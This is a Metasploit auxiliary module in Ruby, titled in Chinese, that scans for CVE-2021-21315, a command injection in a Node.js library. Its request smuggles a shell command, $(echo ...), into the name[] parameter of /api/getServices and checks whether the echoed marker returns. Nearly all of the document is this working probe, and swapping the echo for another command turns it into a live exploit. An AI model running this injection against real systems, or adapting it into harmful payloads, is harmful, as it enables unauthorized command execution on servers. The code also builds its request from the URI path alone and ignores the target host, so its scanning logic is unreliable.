# Node.js命令注入漏洞（CVE-2021-21315）

require "open-uri"  

class MetasploitModule < Msf::Auxiliary
    include Msf::Auxiliary::Scanner
    include Msf::Auxiliary::Report
    include Msf::Exploit::Remote::HttpClient
   
    def initialize
      super(
        'Name'           => 'CVE_2021_21315_PoC',
        'Description'    => 'This module is used to scan the target site for CVE-2021-21315_POC',
        'Author'         => 'H.Mount',
        'License'        => MSF_LICENSE
      )
      deregister_options('SSL','VHOST','Proxies','RPORT')
      register_options(
        [
          OptString.new('RHOSTS', [true, 'The target HOST.Need not to set', '192.168.1.1']),
          OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
        ]) 
    
    end 
    def run_host(ip)
  
      uri = datastore['TARGETURI']+'/api/getServices?name[]=$(echo%20%27H1T52%7BAleph-0%7D%27%20)'  

      begin  
        html_response = nil  
        open(uri) do |http|  
        html_response = http.read  
        end
      rescue => ex
        if ex.message['404']
          print_good('The CVE_2021_21315 vulnerability was not detected at the target site.')
        else
          print_error('Some errors occurred...')
          print_error(ex.message)
        end
        return
      end   
     #  puts html_response
     if html_response['h1t52{aleph-0}']
       print_warning('The CVE_2021_21315 vulnerability exists at the target site!')
     else
       print_good('The CVE_2021_21315 vulnerability was not detected at the target site.')
     end
        

    end
end

